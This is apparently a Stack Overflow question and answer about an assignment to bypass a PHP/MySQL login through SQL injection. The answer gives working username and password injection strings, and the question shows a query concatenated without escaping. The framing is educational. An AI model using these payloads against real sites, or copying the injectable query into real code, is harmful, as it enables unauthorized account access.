-2

I received an assigment to hack a given website using sql injection

$sel1 = mysql_query ("SELECT ID, name, locale, lastlogin, gender,
FROM USERS_TABLE
WHERE (name = ’$user’ OR email = ’$user’) AND pass = ’$pass’");

$chk = mysql_fetch_array($sel1);

if (found one record)
then {allow the user to login}

The question is which values of $user and $password should I enter to hack the website?

I've tried putting a true value in user (eg: admin) and for the $password I tried using (" or ""=")-no brackets which didn't work. I also tried (' or ''=')-no brackets

This looks quite simple, am I missing something?

Terry
  • 63,248
  • 15
  • 96
  • 118
user779444
  • 1,365
  • 4
  • 21
  • 38

1 Answers1

2

I assume this is a school/university assignment, and not for purpose of hacking real sites.

Paste something which would be a part of the valid SQL, and which would make the condition evaluate to TRUE regardless of what's actually in the database.

That means, by entering the "correct" values, you can login to the web site without knowing the actual username/password in the database.

Consider the following condition: 

WHERE (name = '' OR ''='' OR email = '' OR ''='') AND pass = '' OR TRUE LIMIT 1 -- '

It always evaluates to TRUE if there's at least one user in the database, and it returns one row at most (because of LIMIT 1).

Now you must just "extract the pieces from this condition" and enter them as user name and password:

  • User name: ' OR ''='
  • Password: ' OR TRUE LIMIT 1 --

Note that the last apostrophe character at the end of the query which is inserted by PHP becomes a comment and is not causing an SQL syntax error.

Quentin
  • 914,110
  • 126
  • 1,211
  • 1,335
Alex Shesterov
  • 26,085
  • 12
  • 82
  • 103
  • The police in this site isn't kidding around huh? If only we had this cyber army in most video games, maybe the community will be better – user779444 Mar 25 '16 at 23:04
  • @user779444, I believe there was a lot of misunderstanding on your question. Some people thought you were after breaking some real site rather than learning. Such things can happen anywhere occasionally, please don't take it too close. And do not lose faith in StackOverflow, it's a great resource actually. The moderator now just locked the question so everybody gets cool and removed all the useless comments :) – Alex Shesterov Mar 25 '16 at 23:08
  • @user779444, also, if you're keen to learn about web sites security, please try this game: http://xss-game.appspot.com/ It's about XSS, not SQL injections, but quite fun nevertheless (you'll be hacking multiple pages on this site :) ). – Alex Shesterov Mar 25 '16 at 23:10
  • Cool website, thanks. I'd like to belive most people, atleast those with high rep, are like you. Caring, Helpful and belive in stackoverflow and its users. Well done! – user779444 Mar 25 '16 at 23:15